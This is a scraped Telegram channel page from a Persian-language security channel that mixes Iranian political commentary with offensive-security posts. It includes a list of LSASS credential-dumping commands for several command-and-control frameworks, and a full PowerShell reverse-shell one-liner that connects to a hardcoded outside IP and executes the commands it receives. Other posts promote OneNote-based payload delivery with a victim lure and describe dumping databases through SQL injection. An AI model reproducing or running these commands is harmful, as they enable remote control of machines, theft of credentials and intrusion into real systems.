P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
💠 #طرح_صدام_حسینی مجلس برای مجازات اظهارنظر افراد مشهور‼️

🔹 ١٠ تا ١۵ سال حبس، جزای نقدی و ۵ تا ١٠ سال محرومیت از حقوق اجتماعی، جریمه‌ی روشنگری!!!

🔹هر فرد مشهور حتی از نظر علمی با هر نوع اظهار نظر حتی از طریق مقالات علمی مشمول این مجازات است/اعتماد

🔸برهانی(حقوقدان) در واکنش به طرح مجلس برای ممنوعیت اظهار نظر افراد مشهور گفت:

آزادی بیان، شهادتت مبارک.

🔸محسن برهانی(حقوقدان) در واکنش به طرح مجلس برای کنترل فعالیت و اظهار نظر افراد مشهور در توییتی نوشت:

خلاصه این طرح یعنی فکر نکنید و نظر ندهید تا فقط مراجع حکومتی نظر دهند! به فردای بعد از دوره نمایندگی هم فکر کنید؛ روزی که این مزخرفات، دامنتان را می‌گیرد. آزادی بیان، شهادتت مبارک.

@PfkSecurity
P.F.K Security
#0x06 > FTK Imager Methods: Create Disk Image Physical Drive Capture Memory LSASS.exe #0x07 > Volatility Methods: Pstree volatility -f memory_dump.raw –profile=Win7SP1x64 memdump -p -D #0x08 > WinPmem Methods: winpmem.exe -o dump.raw #0x09 > hiberfil.sys…
#0x16 > Cobalt Strike+Sysinternals
Methods: load sysinternals Procexp “File” -> “Save”

Cobalt Strike+schtasks Methods: cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC Weekly /D SAT /TN Commands /TR "'’rundll32.exe’’ C:\windows\system32\comsvcs.dll MiniDump “+strPID+” C:\Windows\Tasks\dump.bin full" /ST 06:06:06 && Schtasks.exe /run /TN Commands && REM ‘ -Force;”

#0x17 >Brute Ratel C4+Kiwi

Methods: load kiwi Lsa_dump_sam lsa_dump_secrets

#0x18 > Metasploit+lsassy
Methods: use post/windows/gather/credentials/lsassy set SESSION Run or exploit

#0x19 > Covenant+SharpKatz
Methods: Create Task->Module->SharpKatz Arguments->lsa_dump

#0x20 >Empire+wmiexec
Methods: Modules credentials/mimikatz/lsass_dump Execute or run sekurlsa::minidump

#0x21> Sliver+lsass_dump
Methods: use lsass_dump Options run

#0x22 > Villain
Methods: villain.exe agent villain.exe client -c villain.exe dump lsass

#0x23 > Octopus
Methods: pupy.exe shell –cmd “python -m pupy.modules.pupywinutils.lsassdump -o C:\temp\lsass.dmp”

#0x24 > NimPlant
Methods: lsassdump

#0x25 > PoshC2+MiniDumpWriteDump
Methods: MiniDumpWriteDump Get-LsassDumpProcDump

#0x26 > PoshC2+NtQueryVirtualMemory
Methods: NtQueryVirtualMemory Get-LsassDumpNtQueryVirtualMemory

#0x27 > PoshC2+BloodHound
Methods: Get-LsassDumpBloodHound

#Lass
@PfkSecurity
💠 بریتانیا طرح تروریستی اعلام شدن سپاه را از دستور کار خارج کرد.
@PfkSecurity
PPLmedic

Dump the memory of any PPL with a Userland exploit chain

Blog:
https://blog.scrt.ch/2023/03/17/bypassing-ppl-in-userland-again/

@pfksecurity
هیچ کشوری از اتحادیه اروپا به جز مجارستان و لهستان امروز در مراسم روی کار آمدن جمهوری‌اسلامی شرکت نکرد.🔥✌️
‏‌
@pfksecurity
💠 ‏یه اپوزیسیونی که صندوق پشتوانه مالی اعتصاب نتونست تشکیل بده و یه وی‌پی ان درست و حسابی یا استارلینک رو نتونست ایران بفرسته، چجوری میشه اعتماد کرد بره پولهای بلوکه شده رو درست خرج بکنه و به باد نده...
هر تلاشی بوده پراکنده و از فعالین مستقل بوده!

"گالادریل"

پ.ن: افرادی در قالب اپوزوسیون میخواهند پول های مردم ایران که توسط دول غربی بلوکه شده را به بهانه مبارزه با رژیم آزاد کرده و استفاده کنند.

@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
نحوه استفاده از Microsoft OneNote در ویندوز
[+] مقدمه ای بر Microsoft OneNote - Payload Delivery
با توجه به تطبیق بیشتر و بیشتر گروه‌های APT با Microsoft OneNote برای Payload Delivery، داشتن حداقل درک سطح بالا از نحوه انجام و اجرای دقیق حمله در زیر hood بسیار مهم است. در ویدئو بالا ، نحوه عملکرد حمله به تفصیل شرح داده شده است، و یک توضیح گام به گام در مورد آماده سازی مورد نیاز برای Payload Delivery از طریق Microsoft OneNote ارائه می شود. یک بهانه نمونه نیز در این ویدئو ارائه شده است (تار کردن یک تصویر محرمانه، تحریک قربانی برای "دابل کلیک برای مشاهده"). می تواند مرجع مفیدی برای دستیابی به دسترسی اولیه برای engagement بعدی شما باشد.
#APT
@PfkSecurity
OSINT پادکست های :

- Breadcrumbs by TraceLabs (twitter - Mastodon)
- The Privacy, Security, & OSINT Show by Michael Bazzell (twitter)
- Layer8 Podcast by Layer8 (twitter)
- The OSINT Jobs Podcast by OSINT Jobs (twitter)
- Exposing the Invisible by Tactical Tech (twitter - Mastodon)
- The Intelligence Brief by HENSHOLDT (twitter)
- The OSINT Curious Project
- Spanish OSINT Podcast: Brigada Osint (Discord)
#podcast
@BlackBoxOsint
پاورشل یک سوکت TCP را در سرور راه دور باز می کند و ورودی را به عنوان یک فرمان اجرا می کند و خروجی را به عقب می فرستد.
بکدور احمقانه!

استفاده:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0.. 65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding) .GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

#powershell
@PfkSecurity
🔖 برای پیروز شدن نیازی به اکثریت نیست...
بلکه یک اقلیت خشمگین و خستگی ناپذیر نیاز است که مشتاق بر افروختن آتش آزادی در ذهن انسانها است.

ساموئل آدامز
@PfkSecurity
بدافزار FakeCalls هم اکنون با استفاده از ai با کیفیت بالا ارتقا یافته و vishing می شود
مقاله جالب در مورد بدافزار جدید FakeCalls... من متوجه نشدم که vishing قبلاً شروع به استفاده از ai برای تولید پاسخ‌های تمیز و خودکار کرده است. من حدس می‌زنم که Chat GPT و Whisper به‌طور نادرستی استفاده می‌شوند. https://www.hackwatcher.com/p/fakecalls-the-next-step-in-voice-phishing

#Malware
@PfkSecurity
دوستان عزیز
اینقدر برای ساقط شدن رژیم به واسطه فروپاشی هورا نکشید و خوشحالی نکنید..
امکان اینکه ما هم بشیم مردم کره شمالی و ونزوئلا و آرژانتین و با تورم همسو بشیم و خودمون رو با فلاکت وفق بدیم بسیاره (که چند دهه اس داریم اینکار رو می کنیم)
عراق رسیده بود به نفت دربرابر غذا ولی صدام سرجاش بود..
حتی اگر بر فرض رژیم به واسطه فروپاشی اقتصادی سقوط کنه هم تبعات سنگین و مهلکش تا دهه ها گریبان‌گیرمان خواهد بود.
گسست اجتماعی و فرهنگی که واسطه فراگیر شدن فقر به وجود میاد، یک شبه از بین نمیره..
تا الان هم شاهد افول فرهنگی مردم که از تورم و گرانی حاصل شده، بودیم..

تا سالها بعد از سقوط رژیم باید با اثرات مخرب این فروپاشی اقتصادی سر وکله بزنیم..
مخلص کلام :
عقل سلیم راه کم هزینه و با احتمال پیروزی بالا رو انتخاب می کنه.
اینکه منتظر باشیم رژيم با فروپاشی ساقط بشه پرهزینه ترین راه ممکن و با احتمال موفقیت اندک هست..

@pfksecurity
‏«در بلایای طبیعی هیچ چیز طبیعی‌ای وجود ندارد.» دیوید هاروی،جغرافی‌دان

زلزله‌ای که در ژاپن مرگبار نیست در ایران یا ترکیه به فاجعه می‌انجامد زیرا در خاورمیانۀ آکنده از تبعیض،امنیت امری صرفاً نظامی تلقی می‌شود و ابعاد اجتماعی و اقتصادی آن،و از همه مهم‌تر،«کرامت» آدمی نادیده می‌ماند

@PfkSecurity
موضوع اصلی مباحث تخصصی در مورد تست نفوذ هست ولی برای بحث های دیگه باید بگم ، تمام عقاید قابل نقد و بحث هستند و آزادی بیان(بدون فحاشی و محترمانه) مبنای مباحثه است.

لینک گروه :

https://t.iss.one/+114BerAH5lo1ODM0
P.F.K Security
چگونه یک شرکت را هک کردم (اولین تعامل تیم قرمز من 🚩 ) درود دوستان! اخیراً با اولین همکاری تیم قرمز خود مواجه شدم. مشتری این تعامل یک شرکت بزرگ فین تک با شبکه گسترده ای بود. رویکرد تعامل، انجام یک شبیه‌سازی دشمن با سناریوی نقض فرض کنید. این پست صرفاً روش تعاملی…
اعضای تیم ما در حالی که به دنبال آسیب‌پذیری‌های وب بودند، بسیاری از تزریق‌های SQL را از محدوده تارگت پیدا کردند. من شروع به جمع‌آوری دامنه‌ها کردم و به‌طور دستی آسیب‌پذیری را برای یافتن اینکه سرور از چه پایگاه‌داده‌ای استفاده می‌کند.

وقتی صحبت از SQL Injection می شود، من همیشه از برگه تقلب تزریق SQL Portswigger برای مرجع استفاده می کنم.
در حین بررسی آن سایت ها، یک چیز مشترک را پیدا کردم که همه آنها به اشتراک گذاشته بودند. برخی از گروه‌های خاصی از سایت‌ها از همان پشته فناوری برای برنامه‌های کاربردی وب خود استفاده می‌کردند. آنها از دات نت برای قسمت جلویی، سرور IIS برای میزبانی و MSSQL (به صورت دستی) برای قسمت پشتی استفاده می کردند.
# Typical Enterprise Web Application Stack Front End (.NET) <---> Server (IIS) <---> Back End (MSSQL)
جدای از اینها، آنها از برنامه ها و برنامه های وردپرس با PHP + MySQL استفاده کرده اند که رفتاری مشابه وردپرس دارد اما وردپرس نیست.
من از sqlmap برای حذف کل DB از پایگاه داده MySQL استفاده کردم، و سایت های دیگر (از جمله MSSQL، جایی که یک DB مشترک با بسیاری از برنامه های کاربردی وب همگام سازی شده بودند) Blind SQLi داشتند که زمان بیشتری برای bruteforce و تخلیه داده ها می برد. حذف نام پایگاه داده و نام جدول به تنهایی به من درک خوبی از دامنه های داخلی و برنامه های وب داخلی آنها داد.


ادامه دارد ....
@pfksecurity